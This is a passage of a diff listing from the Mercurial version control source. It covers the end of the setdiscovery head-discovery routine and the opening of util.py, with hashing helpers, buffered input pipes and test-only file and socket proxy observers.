300 300 roundtrips += 1
301 301 # We also ask remote about all the local heads. That set can be arbitrarily
302 302 # large, so we used to limit it size to `initialsamplesize`. We no longer
303 303 # do as it proved counter productive. The skipped heads could lead to a
304 304 # large "undecided" set, slower to be clarified than if we asked the
305 305 # question for all heads right away.
306 306 #
307 307 # We are already fetching all server heads using the `heads` commands,
308 308 # sending a equivalent number of heads the other way should not have a
309 309 # significant impact. In addition, it is very likely that we are going to
310 310 # have to issue "known" request for an equivalent amount of revisions in
311 311 # order to decide if theses heads are common or missing.
312 312 #
313 313 # find a detailled analysis below.
314 314 #
315 315 # Case A: local and server both has few heads
316 316 #
317 317 # Ownheads is below initialsamplesize, limit would not have any effect.
318 318 #
319 319 # Case B: local has few heads and server has many
320 320 #
321 321 # Ownheads is below initialsamplesize, limit would not have any effect.
322 322 #
323 323 # Case C: local and server both has many heads
324 324 #
325 325 # We now transfert some more data, but not significantly more than is
326 326 # already transfered to carry the server heads.
327 327 #
328 328 # Case D: local has many heads, server has few
329 329 #
330 330 # D.1 local heads are mostly known remotely
331 331 #
332 332 # All the known head will have be part of a `known` request at some
333 333 # point for the discovery to finish. Sending them all earlier is
334 334 # actually helping.
335 335 #
336 336 # (This case is fairly unlikely, it requires the numerous heads to all
337 337 # be merged server side in only a few heads)
338 338 #
339 339 # D.2 local heads are mostly missing remotely
340 340 #
341 341 # To determine that the heads are missing, we'll have to issue `known`
342 342 # request for them or one of their ancestors. This amount of `known`
343 343 # request will likely be in the same order of magnitude than the amount
344 344 # of local heads.
345 345 #
346 346 # The only case where we can be more efficient using `known` request on
347 347 # ancestors are case were all the "missing" local heads are based on a
348 348 # few changeset, also "missing". This means we would have a "complex"
349 349 # graph (with many heads) attached to, but very independant to a the
350 350 # "simple" graph on the server. This is a fairly usual case and have
351 351 # not been met in the wild so far.
352 352 if remote.limitedarguments:
353 353 sample = _limitsample(ownheads, initialsamplesize)
354 354 # indices between sample and externalized version must match
355 355 sample = list(sample)
356 356 else:
357 357 sample = ownheads
358 358
359 359 with remote.commandexecutor() as e:
360 360 fheads = e.callcommand('heads', {})
361 361 fknown = e.callcommand('known', {
362 362 'nodes': [clnode(r) for r in sample],
363 363 })
364 364
365 365 srvheadhashes, yesno = fheads.result(), fknown.result()
366 366
367 367 if cl.tip() == nullid:
368 368 if srvheadhashes != [nullid]:
369 369 return [nullid], True, srvheadhashes
370 370 return [nullid], False, []
371 371
372 372 # start actual discovery (we note this before the next "if" for
373 373 # compatibility reasons)
374 374 ui.status(_("searching for changes\n"))
375 375
376 376 knownsrvheads = [] # revnos of remote heads that are known locally
377 377 for node in srvheadhashes:
378 378 if node == nullid:
379 379 continue
380 380
381 381 try:
382 382 knownsrvheads.append(clrev(node))
383 383 # Catches unknown and filtered nodes.
384 384 except error.LookupError:
385 385 continue
386 386
387 387 if len(knownsrvheads) == len(srvheadhashes):
388 388 ui.debug("all remote heads known locally\n")
389 389 return srvheadhashes, False, srvheadhashes
390 390
391 391 if len(sample) == len(ownheads) and all(yesno):
392 392 ui.note(_("all local heads known remotely\n"))
393 393 ownheadhashes = [clnode(r) for r in ownheads]
394 394 return ownheadhashes, True, srvheadhashes
395 395
396 396 # full blown discovery
397 397
398 398 randomize = ui.configbool('devel', 'discovery.randomize')
399 399 disco = partialdiscovery(local, ownheads, remote.limitedarguments,
400 400 randomize=randomize)
401 401 # treat remote heads (and maybe own heads) as a first implicit sample
402 402 # response
403 403 disco.addcommons(knownsrvheads)
404 404 disco.addinfo(zip(sample, yesno))
405 405
406 406 full = False
407 407 progress = ui.makeprogress(_('searching'), unit=_('queries'))
408 408 while not disco.iscomplete():
409 409
410 410 if full or disco.hasinfo():
411 411 if full:
412 412 ui.note(_("sampling from both directions\n"))
413 413 else:
414 414 ui.debug("taking initial sample\n")
415 415 samplefunc = disco.takefullsample
416 416 targetsize = fullsamplesize
417 417 if not remote.limitedarguments:
418 418 fullsamplesize = int(fullsamplesize * samplegrowth)
419 419 else:
420 420 # use even cheaper initial sample
421 421 ui.debug("taking quick initial sample\n")
422 422 samplefunc = disco.takequicksample
423 423 targetsize = initialsamplesize
424 424 sample = samplefunc(ownheads, targetsize)
425 425
426 426 roundtrips += 1
427 427 progress.update(roundtrips)
428 428 stats = disco.stats()
429 429 ui.debug("query %i; still undecided: %i, sample size is: %i\n"
430 430 % (roundtrips, stats['undecided'], len(sample)))
431 431
432 432 # indices between sample and externalized version must match
433 433 sample = list(sample)
434 434
435 435 with remote.commandexecutor() as e:
436 436 yesno = e.callcommand('known', {
437 437 'nodes': [clnode(r) for r in sample],
438 438 }).result()
439 439
440 440 full = True
441 441
442 442 disco.addinfo(zip(sample, yesno))
443 443
444 444 result = disco.commonheads()
445 445 elapsed = util.timer() - start
446 446 progress.complete()
447 447 ui.debug("%d total queries in %.4fs\n" % (roundtrips, elapsed))
448 448 msg = ('found %d common and %d unknown server heads,'
449 449 ' %d roundtrips in %.4fs\n')
450 450 missing = set(result) - set(knownsrvheads)
451 451 ui.log('discovery', msg, len(result), len(missing), roundtrips,
452 452 elapsed)
453 453
454 454 if not result and srvheadhashes != [nullid]:
455 455 if abortwhenunrelated:
456 456 raise error.Abort(_("repository is unrelated"))
457 457 else:
458 458 ui.warn(_("warning: repository is unrelated\n"))
459 459 return ({nullid}, True, srvheadhashes,)
460 460
461 461 anyincoming = (srvheadhashes != [nullid])
462 462 result = {clnode(r) for r in result}
463 463 return result, anyincoming, srvheadhashes
@@ -1,3326 +1,3326 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import (
38 38 attr,
39 39 )
40 40 from hgdemandimport import tracing
41 41 from . import (
42 42 encoding,
43 43 error,
44 44 i18n,
45 45 node as nodemod,
46 46 policy,
47 47 pycompat,
48 48 urllibcompat,
49 49 )
50 50 from .utils import (
51 51 compression,
52 52 procutil,
53 53 stringutil,
54 54 )
55 55
56 rustdirs = policy.importrust('dirstate', 'Dirs')
56 rustdirs = policy.importrust(r'dirstate', r'Dirs')
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 httplib = pycompat.httplib
67 67 pickle = pycompat.pickle
68 68 safehasattr = pycompat.safehasattr
69 69 socketserver = pycompat.socketserver
70 70 bytesio = pycompat.bytesio
71 71 # TODO deprecate stringio name, as it is a lie on Python 3.
72 72 stringio = bytesio
73 73 xmlrpclib = pycompat.xmlrpclib
74 74
75 75 httpserver = urllibcompat.httpserver
76 76 urlerr = urllibcompat.urlerr
77 77 urlreq = urllibcompat.urlreq
78 78
79 79 # workaround for win32mbcs
80 80 _filenamebytestr = pycompat.bytestr
81 81
82 82 if pycompat.iswindows:
83 83 from . import windows as platform
84 84 else:
85 85 from . import posix as platform
86 86
87 87 _ = i18n._
88 88
89 89 bindunixsocket = platform.bindunixsocket
90 90 cachestat = platform.cachestat
91 91 checkexec = platform.checkexec
92 92 checklink = platform.checklink
93 93 copymode = platform.copymode
94 94 expandglobs = platform.expandglobs
95 95 getfsmountpoint = platform.getfsmountpoint
96 96 getfstype = platform.getfstype
97 97 groupmembers = platform.groupmembers
98 98 groupname = platform.groupname
99 99 isexec = platform.isexec
100 100 isowner = platform.isowner
101 101 listdir = osutil.listdir
102 102 localpath = platform.localpath
103 103 lookupreg = platform.lookupreg
104 104 makedir = platform.makedir
105 105 nlinks = platform.nlinks
106 106 normpath = platform.normpath
107 107 normcase = platform.normcase
108 108 normcasespec = platform.normcasespec
109 109 normcasefallback = platform.normcasefallback
110 110 openhardlinks = platform.openhardlinks
111 111 oslink = platform.oslink
112 112 parsepatchoutput = platform.parsepatchoutput
113 113 pconvert = platform.pconvert
114 114 poll = platform.poll
115 115 posixfile = platform.posixfile
116 116 readlink = platform.readlink
117 117 rename = platform.rename
118 118 removedirs = platform.removedirs
119 119 samedevice = platform.samedevice
120 120 samefile = platform.samefile
121 121 samestat = platform.samestat
122 122 setflags = platform.setflags
123 123 split = platform.split
124 124 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
125 125 statisexec = platform.statisexec
126 126 statislink = platform.statislink
127 127 umask = platform.umask
128 128 unlink = platform.unlink
129 129 username = platform.username
130 130
131 131 # small compat layer
132 132 compengines = compression.compengines
133 133 SERVERROLE = compression.SERVERROLE
134 134 CLIENTROLE = compression.CLIENTROLE
135 135
136 136 try:
137 137 recvfds = osutil.recvfds
138 138 except AttributeError:
139 139 pass
140 140
141 141 # Python compatibility
142 142
143 143 _notset = object()
144 144
145 145 def bitsfrom(container):
146 146 bits = 0
147 147 for bit in container:
148 148 bits |= bit
149 149 return bits
150 150
151 151 # python 2.6 still have deprecation warning enabled by default. We do not want
152 152 # to display anything to standard user so detect if we are running test and
153 153 # only use python deprecation warning in this case.
154 154 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
155 155 if _dowarn:
156 156 # explicitly unfilter our warning for python 2.7
157 157 #
158 158 # The option of setting PYTHONWARNINGS in the test runner was investigated.
159 159 # However, module name set through PYTHONWARNINGS was exactly matched, so
160 160 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
161 161 # makes the whole PYTHONWARNINGS thing useless for our usecase.
162 162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
163 163 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
164 164 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
165 165 if _dowarn and pycompat.ispy3:
166 166 # silence warning emitted by passing user string to re.sub()
167 167 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
168 168 r'mercurial')
169 169 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
170 170 DeprecationWarning, r'mercurial')
171 171 # TODO: reinvent imp.is_frozen()
172 172 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
173 173 DeprecationWarning, r'mercurial')
174 174
175 175 def nouideprecwarn(msg, version, stacklevel=1):
176 176 """Issue an python native deprecation warning
177 177
178 178 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
179 179 """
180 180 if _dowarn:
181 181 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
182 182 " update your code.)") % version
183 183 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
184 184
185 185 DIGESTS = {
186 186 'md5': hashlib.md5,
187 187 'sha1': hashlib.sha1,
188 188 'sha512': hashlib.sha512,
189 189 }
190 190 # List of digest types from strongest to weakest
191 191 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
192 192
193 193 for k in DIGESTS_BY_STRENGTH:
194 194 assert k in DIGESTS
195 195
196 196 class digester(object):
197 197 """helper to compute digests.
198 198
199 199 This helper can be used to compute one or more digests given their name.
200 200
201 201 >>> d = digester([b'md5', b'sha1'])
202 202 >>> d.update(b'foo')
203 203 >>> [k for k in sorted(d)]
204 204 ['md5', 'sha1']
205 205 >>> d[b'md5']
206 206 'acbd18db4cc2f85cedef654fccc4a4d8'
207 207 >>> d[b'sha1']
208 208 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
209 209 >>> digester.preferred([b'md5', b'sha1'])
210 210 'sha1'
211 211 """
212 212
213 213 def __init__(self, digests, s=''):
214 214 self._hashes = {}
215 215 for k in digests:
216 216 if k not in DIGESTS:
217 217 raise error.Abort(_('unknown digest type: %s') % k)
218 218 self._hashes[k] = DIGESTS[k]()
219 219 if s:
220 220 self.update(s)
221 221
222 222 def update(self, data):
223 223 for h in self._hashes.values():
224 224 h.update(data)
225 225
226 226 def __getitem__(self, key):
227 227 if key not in DIGESTS:
228 228 raise error.Abort(_('unknown digest type: %s') % k)
229 229 return nodemod.hex(self._hashes[key].digest())
230 230
231 231 def __iter__(self):
232 232 return iter(self._hashes)
233 233
234 234 @staticmethod
235 235 def preferred(supported):
236 236 """returns the strongest digest type in both supported and DIGESTS."""
237 237
238 238 for k in DIGESTS_BY_STRENGTH:
239 239 if k in supported:
240 240 return k
241 241 return None
242 242
243 243 class digestchecker(object):
244 244 """file handle wrapper that additionally checks content against a given
245 245 size and digests.
246 246
247 247 d = digestchecker(fh, size, {'md5': '...'})
248 248
249 249 When multiple digests are given, all of them are validated.
250 250 """
251 251
252 252 def __init__(self, fh, size, digests):
253 253 self._fh = fh
254 254 self._size = size
255 255 self._got = 0
256 256 self._digests = dict(digests)
257 257 self._digester = digester(self._digests.keys())
258 258
259 259 def read(self, length=-1):
260 260 content = self._fh.read(length)
261 261 self._digester.update(content)
262 262 self._got += len(content)
263 263 return content
264 264
265 265 def validate(self):
266 266 if self._size != self._got:
267 267 raise error.Abort(_('size mismatch: expected %d, got %d') %
268 268 (self._size, self._got))
269 269 for k, v in self._digests.items():
270 270 if v != self._digester[k]:
271 271 # i18n: first parameter is a digest name
272 272 raise error.Abort(_('%s mismatch: expected %s, got %s') %
273 273 (k, v, self._digester[k]))
274 274
275 275 try:
276 276 buffer = buffer
277 277 except NameError:
278 278 def buffer(sliceable, offset=0, length=None):
279 279 if length is not None:
280 280 return memoryview(sliceable)[offset:offset + length]
281 281 return memoryview(sliceable)[offset:]
282 282
283 283 _chunksize = 4096
284 284
285 285 class bufferedinputpipe(object):
286 286 """a manually buffered input pipe
287 287
288 288 Python will not let us use buffered IO and lazy reading with 'polling' at
289 289 the same time. We cannot probe the buffer state and select will not detect
290 290 that data are ready to read if they are already buffered.
291 291
292 292 This class let us work around that by implementing its own buffering
293 293 (allowing efficient readline) while offering a way to know if the buffer is
294 294 empty from the output (allowing collaboration of the buffer with polling).
295 295
296 296 This class lives in the 'util' module because it makes use of the 'os'
297 297 module from the python stdlib.
298 298 """
299 299 def __new__(cls, fh):
300 300 # If we receive a fileobjectproxy, we need to use a variation of this
301 301 # class that notifies observers about activity.
302 302 if isinstance(fh, fileobjectproxy):
303 303 cls = observedbufferedinputpipe
304 304
305 305 return super(bufferedinputpipe, cls).__new__(cls)
306 306
307 307 def __init__(self, input):
308 308 self._input = input
309 309 self._buffer = []
310 310 self._eof = False
311 311 self._lenbuf = 0
312 312
313 313 @property
314 314 def hasbuffer(self):
315 315 """True is any data is currently buffered
316 316
317 317 This will be used externally a pre-step for polling IO. If there is
318 318 already data then no polling should be set in place."""
319 319 return bool(self._buffer)
320 320
321 321 @property
322 322 def closed(self):
323 323 return self._input.closed
324 324
325 325 def fileno(self):
326 326 return self._input.fileno()
327 327
328 328 def close(self):
329 329 return self._input.close()
330 330
331 331 def read(self, size):
332 332 while (not self._eof) and (self._lenbuf < size):
333 333 self._fillbuffer()
334 334 return self._frombuffer(size)
335 335
336 336 def unbufferedread(self, size):
337 337 if not self._eof and self._lenbuf == 0:
338 338 self._fillbuffer(max(size, _chunksize))
339 339 return self._frombuffer(min(self._lenbuf, size))
340 340
341 341 def readline(self, *args, **kwargs):
342 342 if len(self._buffer) > 1:
343 343 # this should not happen because both read and readline end with a
344 344 # _frombuffer call that collapse it.
345 345 self._buffer = [''.join(self._buffer)]
346 346 self._lenbuf = len(self._buffer[0])
347 347 lfi = -1
348 348 if self._buffer:
349 349 lfi = self._buffer[-1].find('\n')
350 350 while (not self._eof) and lfi < 0:
351 351 self._fillbuffer()
352 352 if self._buffer:
353 353 lfi = self._buffer[-1].find('\n')
354 354 size = lfi + 1
355 355 if lfi < 0: # end of file
356 356 size = self._lenbuf
357 357 elif len(self._buffer) > 1:
358 358 # we need to take previous chunks into account
359 359 size += self._lenbuf - len(self._buffer[-1])
360 360 return self._frombuffer(size)
361 361
362 362 def _frombuffer(self, size):
363 363 """return at most 'size' data from the buffer
364 364
365 365 The data are removed from the buffer."""
366 366 if size == 0 or not self._buffer:
367 367 return ''
368 368 buf = self._buffer[0]
369 369 if len(self._buffer) > 1:
370 370 buf = ''.join(self._buffer)
371 371
372 372 data = buf[:size]
373 373 buf = buf[len(data):]
374 374 if buf:
375 375 self._buffer = [buf]
376 376 self._lenbuf = len(buf)
377 377 else:
378 378 self._buffer = []
379 379 self._lenbuf = 0
380 380 return data
381 381
382 382 def _fillbuffer(self, size=_chunksize):
383 383 """read data to the buffer"""
384 384 data = os.read(self._input.fileno(), size)
385 385 if not data:
386 386 self._eof = True
387 387 else:
388 388 self._lenbuf += len(data)
389 389 self._buffer.append(data)
390 390
391 391 return data
392 392
393 393 def mmapread(fp):
394 394 try:
395 395 fd = getattr(fp, 'fileno', lambda: fp)()
396 396 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
397 397 except ValueError:
398 398 # Empty files cannot be mmapped, but mmapread should still work. Check
399 399 # if the file is empty, and if so, return an empty buffer.
400 400 if os.fstat(fd).st_size == 0:
401 401 return ''
402 402 raise
403 403
404 404 class fileobjectproxy(object):
405 405 """A proxy around file objects that tells a watcher when events occur.
406 406
407 407 This type is intended to only be used for testing purposes. Think hard
408 408 before using it in important code.
409 409 """
410 410 __slots__ = (
411 411 r'_orig',
412 412 r'_observer',
413 413 )
414 414
415 415 def __init__(self, fh, observer):
416 416 object.__setattr__(self, r'_orig', fh)
417 417 object.__setattr__(self, r'_observer', observer)
418 418
419 419 def __getattribute__(self, name):
420 420 ours = {
421 421 r'_observer',
422 422
423 423 # IOBase
424 424 r'close',
425 425 # closed if a property
426 426 r'fileno',
427 427 r'flush',
428 428 r'isatty',
429 429 r'readable',
430 430 r'readline',
431 431 r'readlines',
432 432 r'seek',
433 433 r'seekable',
434 434 r'tell',
435 435 r'truncate',
436 436 r'writable',
437 437 r'writelines',
438 438 # RawIOBase
439 439 r'read',
440 440 r'readall',
441 441 r'readinto',
442 442 r'write',
443 443 # BufferedIOBase
444 444 # raw is a property
445 445 r'detach',
446 446 # read defined above
447 447 r'read1',
448 448 # readinto defined above
449 449 # write defined above
450 450 }
451 451
452 452 # We only observe some methods.
453 453 if name in ours:
454 454 return object.__getattribute__(self, name)
455 455
456 456 return getattr(object.__getattribute__(self, r'_orig'), name)
457 457
458 458 def __nonzero__(self):
459 459 return bool(object.__getattribute__(self, r'_orig'))
460 460
461 461 __bool__ = __nonzero__
462 462
463 463 def __delattr__(self, name):
464 464 return delattr(object.__getattribute__(self, r'_orig'), name)
465 465
466 466 def __setattr__(self, name, value):
467 467 return setattr(object.__getattribute__(self, r'_orig'), name, value)
468 468
469 469 def __iter__(self):
470 470 return object.__getattribute__(self, r'_orig').__iter__()
471 471
472 472 def _observedcall(self, name, *args, **kwargs):
473 473 # Call the original object.
474 474 orig = object.__getattribute__(self, r'_orig')
475 475 res = getattr(orig, name)(*args, **kwargs)
476 476
477 477 # Call a method on the observer of the same name with arguments
478 478 # so it can react, log, etc.
479 479 observer = object.__getattribute__(self, r'_observer')
480 480 fn = getattr(observer, name, None)
481 481 if fn:
482 482 fn(res, *args, **kwargs)
483 483
484 484 return res
485 485
486 486 def close(self, *args, **kwargs):
487 487 return object.__getattribute__(self, r'_observedcall')(
488 488 r'close', *args, **kwargs)
489 489
490 490 def fileno(self, *args, **kwargs):
491 491 return object.__getattribute__(self, r'_observedcall')(
492 492 r'fileno', *args, **kwargs)
493 493
494 494 def flush(self, *args, **kwargs):
495 495 return object.__getattribute__(self, r'_observedcall')(
496 496 r'flush', *args, **kwargs)
497 497
498 498 def isatty(self, *args, **kwargs):
499 499 return object.__getattribute__(self, r'_observedcall')(
500 500 r'isatty', *args, **kwargs)
501 501
502 502 def readable(self, *args, **kwargs):
503 503 return object.__getattribute__(self, r'_observedcall')(
504 504 r'readable', *args, **kwargs)
505 505
506 506 def readline(self, *args, **kwargs):
507 507 return object.__getattribute__(self, r'_observedcall')(
508 508 r'readline', *args, **kwargs)
509 509
510 510 def readlines(self, *args, **kwargs):
511 511 return object.__getattribute__(self, r'_observedcall')(
512 512 r'readlines', *args, **kwargs)
513 513
514 514 def seek(self, *args, **kwargs):
515 515 return object.__getattribute__(self, r'_observedcall')(
516 516 r'seek', *args, **kwargs)
517 517
518 518 def seekable(self, *args, **kwargs):
519 519 return object.__getattribute__(self, r'_observedcall')(
520 520 r'seekable', *args, **kwargs)
521 521
522 522 def tell(self, *args, **kwargs):
523 523 return object.__getattribute__(self, r'_observedcall')(
524 524 r'tell', *args, **kwargs)
525 525
526 526 def truncate(self, *args, **kwargs):
527 527 return object.__getattribute__(self, r'_observedcall')(
528 528 r'truncate', *args, **kwargs)
529 529
530 530 def writable(self, *args, **kwargs):
531 531 return object.__getattribute__(self, r'_observedcall')(
532 532 r'writable', *args, **kwargs)
533 533
534 534 def writelines(self, *args, **kwargs):
535 535 return object.__getattribute__(self, r'_observedcall')(
536 536 r'writelines', *args, **kwargs)
537 537
538 538 def read(self, *args, **kwargs):
539 539 return object.__getattribute__(self, r'_observedcall')(
540 540 r'read', *args, **kwargs)
541 541
542 542 def readall(self, *args, **kwargs):
543 543 return object.__getattribute__(self, r'_observedcall')(
544 544 r'readall', *args, **kwargs)
545 545
546 546 def readinto(self, *args, **kwargs):
547 547 return object.__getattribute__(self, r'_observedcall')(
548 548 r'readinto', *args, **kwargs)
549 549
550 550 def write(self, *args, **kwargs):
551 551 return object.__getattribute__(self, r'_observedcall')(
552 552 r'write', *args, **kwargs)
553 553
554 554 def detach(self, *args, **kwargs):
555 555 return object.__getattribute__(self, r'_observedcall')(
556 556 r'detach', *args, **kwargs)
557 557
558 558 def read1(self, *args, **kwargs):
559 559 return object.__getattribute__(self, r'_observedcall')(
560 560 r'read1', *args, **kwargs)
561 561
562 562 class observedbufferedinputpipe(bufferedinputpipe):
563 563 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
564 564
565 565 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
566 566 bypass ``fileobjectproxy``. Because of this, we need to make
567 567 ``bufferedinputpipe`` aware of these operations.
568 568
569 569 This variation of ``bufferedinputpipe`` can notify observers about
570 570 ``os.read()`` events. It also re-publishes other events, such as
571 571 ``read()`` and ``readline()``.
572 572 """
573 573 def _fillbuffer(self):
574 574 res = super(observedbufferedinputpipe, self)._fillbuffer()
575 575
576 576 fn = getattr(self._input._observer, r'osread', None)
577 577 if fn:
578 578 fn(res, _chunksize)
579 579
580 580 return res
581 581
582 582 # We use different observer methods because the operation isn't
583 583 # performed on the actual file object but on us.
584 584 def read(self, size):
585 585 res = super(observedbufferedinputpipe, self).read(size)
586 586
587 587 fn = getattr(self._input._observer, r'bufferedread', None)
588 588 if fn:
589 589 fn(res, size)
590 590
591 591 return res
592 592
593 593 def readline(self, *args, **kwargs):
594 594 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
595 595
596 596 fn = getattr(self._input._observer, r'bufferedreadline', None)
597 597 if fn:
598 598 fn(res)
599 599
600 600 return res
601 601
602 602 PROXIED_SOCKET_METHODS = {
603 603 r'makefile',
604 604 r'recv',
605 605 r'recvfrom',
606 606 r'recvfrom_into',
607 607 r'recv_into',
608 608 r'send',
609 609 r'sendall',
610 610 r'sendto',
611 611 r'setblocking',
612 612 r'settimeout',
613 613 r'gettimeout',
614 614 r'setsockopt',
615 615 }
616 616
617 617 class socketproxy(object):
618 618 """A proxy around a socket that tells a watcher when events occur.
619 619
620 620 This is like ``fileobjectproxy`` except for sockets.
621 621
622 622 This type is intended to only be used for testing purposes. Think hard
623 623 before using it in important code.
624 624 """
625 625 __slots__ = (
626 626 r'_orig',
627 627 r'_observer',
628 628 )
629 629
630 630 def __init__(self, sock, observer):
631 631 object.__setattr__(self, r'_orig', sock)
632 632 object.__setattr__(self, r'_observer', observer)
633 633
634 634 def __getattribute__(self, name):
635 635 if name in PROXIED_SOCKET_METHODS:
636 636 return object.__getattribute__(self, name)
637 637
638 638 return getattr(object.__getattribute__(self, r'_orig'), name)
639 639
640 640 def __delattr__(self, name):
641 641 return delattr(object.__getattribute__(self, r'_orig'), name)
642 642
643 643 def __setattr__(self, name, value):
644 644 return setattr(object.__getattribute__(self, r'_orig'), name, value)
645 645
646 646 def __nonzero__(self):
647 647 return bool(object.__getattribute__(self, r'_orig'))
648 648
649 649 __bool__ = __nonzero__
650 650
651 651 def _observedcall(self, name, *args, **kwargs):
652 652 # Call the original object.
653 653 orig = object.__getattribute__(self, r'_orig')
654 654 res = getattr(orig, name)(*args, **kwargs)
655 655
656 656 # Call a method on the observer of the same name with arguments
657 657 # so it can react, log, etc.
658 658 observer = object.__getattribute__(self, r'_observer')
659 659 fn = getattr(observer, name, None)
660 660 if fn:
661 661 fn(res, *args, **kwargs)
662 662
663 663 return res
664 664
665 665 def makefile(self, *args, **kwargs):
666 666 res = object.__getattribute__(self, r'_observedcall')(
667 667 r'makefile', *args, **kwargs)
668 668
669 669 # The file object may be used for I/O. So we turn it into a
670 670 # proxy using our observer.
671 671 observer = object.__getattribute__(self, r'_observer')
672 672 return makeloggingfileobject(observer.fh, res, observer.name,
673 673 reads=observer.reads,
674 674 writes=observer.writes,
675 675 logdata=observer.logdata,
676 676 logdataapis=observer.logdataapis)
677 677
678 678 def recv(self, *args, **kwargs):
679 679 return object.__getattribute__(self, r'_observedcall')(
680 680 r'recv', *args, **kwargs)
681 681
682 682 def recvfrom(self, *args, **kwargs):
683 683 return object.__getattribute__(self, r'_observedcall')(
684 684 r'recvfrom', *args, **kwargs)
685 685
686 686 def recvfrom_into(self, *args, **kwargs):
687 687 return object.__getattribute__(self, r'_observedcall')(
688 688 r'recvfrom_into', *args, **kwargs)
689 689
690 690 def recv_into(self, *args, **kwargs):
691 691 return object.__getattribute__(self, r'_observedcall')(
692 692 r'recv_info', *args, **kwargs)
693 693
694 694 def send(self, *args, **kwargs):
695 695 return object.__getattribute__(self, r'_observedcall')(
696 696 r'send', *args, **kwargs)
697 697
698 698 def sendall(self, *args, **kwargs):
699 699 return object.__getattribute__(self, r'_observedcall')(
700 700 r'sendall', *args, **kwargs)
701 701
702 702 def sendto(self, *args, **kwargs):
703 703 return object.__getattribute__(self, r'_observedcall')(
704 704 r'sendto', *args, **kwargs)
705 705
706 706 def setblocking(self, *args, **kwargs):
707 707 return object.__getattribute__(self, r'_observedcall')(
708 708 r'setblocking', *args, **kwargs)
709 709
710 710 def settimeout(self, *args, **kwargs):
711 711 return object.__getattribute__(self, r'_observedcall')(
712 712 r'settimeout', *args, **kwargs)
713 713
714 714 def gettimeout(self, *args, **kwargs):
715 715 return object.__getattribute__(self, r'_observedcall')(
716 716 r'gettimeout', *args, **kwargs)
717 717
718 718 def setsockopt(self, *args, **kwargs):
719 719 return object.__getattribute__(self, r'_observedcall')(
720 720 r'setsockopt', *args, **kwargs)
721 721
722 722 class baseproxyobserver(object):
723 723 def _writedata(self, data):
724 724 if not self.logdata:
725 725 if self.logdataapis:
726 726 self.fh.write('\n')
727 727 self.fh.flush()
728 728 return
729 729
730 730 # Simple case writes all data on a single line.
731 731 if b'\n' not in data:
732 732 if self.logdataapis:
733 733 self.fh.write(': %s\n' % stringutil.escapestr(data))
734 734 else:
735 735 self.fh.write('%s> %s\n'
736 736 % (self.name, stringutil.escapestr(data)))
737 737 self.fh.flush()
738 738 return
739 739
740 740 # Data with newlines is written to multiple lines.
741 741 if self.logdataapis:
742 742 self.fh.write(':\n')
743 743
744 744 lines = data.splitlines(True)
745 745 for line in lines:
746 746 self.fh.write('%s> %s\n'
747 747 % (self.name, stringutil.escapestr(line)))
748 748 self.fh.flush()
749 749
750 750 class fileobjectobserver(baseproxyobserver):
751 751 """Logs file object activity."""
752 752 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
753 753 logdataapis=True):
754 754 self.fh = fh
755 755 self.name = name
756 756 self.logdata = logdata
757 757 self.logdataapis = logdataapis
758 758 self.reads = reads
759 759 self.writes = writes
760 760
761 761 def read(self, res, size=-1):
762 762 if not self.reads:
763 763 return
764 764 # Python 3 can return None from reads at EOF instead of empty strings.
765 765 if res is None:
766 766 res = ''
767 767
768 768 if size == -1 and res == '':
769 769 # Suppress pointless read(-1) calls that return
770 770 # nothing. These happen _a lot_ on Python 3, and there
771 771 # doesn't seem to be a better workaround to have matching
772 772 # Python 2 and 3 behavior. :(
773 773 return
774 774
775 775 if self.logdataapis:
776 776 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
777 777
778 778 self._writedata(res)
779 779
780 780 def readline(self, res, limit=-1):
781 781 if not self.reads:
782 782 return
783 783
784 784 if self.logdataapis:
785 785 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
786 786
787 787 self._writedata(res)
788 788
789 789 def readinto(self, res, dest):
790 790 if not self.reads:
791 791 return
792 792
793 793 if self.logdataapis:
794 794 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
795 795 res))
796 796
797 797 data = dest[0:res] if res is not None else b''
798 798
799 799 # _writedata() uses "in" operator and is confused by memoryview because
800 800 # characters are ints on Python 3.
801 801 if isinstance(data, memoryview):
802 802 data = data.tobytes()
803 803
804 804 self._writedata(data)
805 805
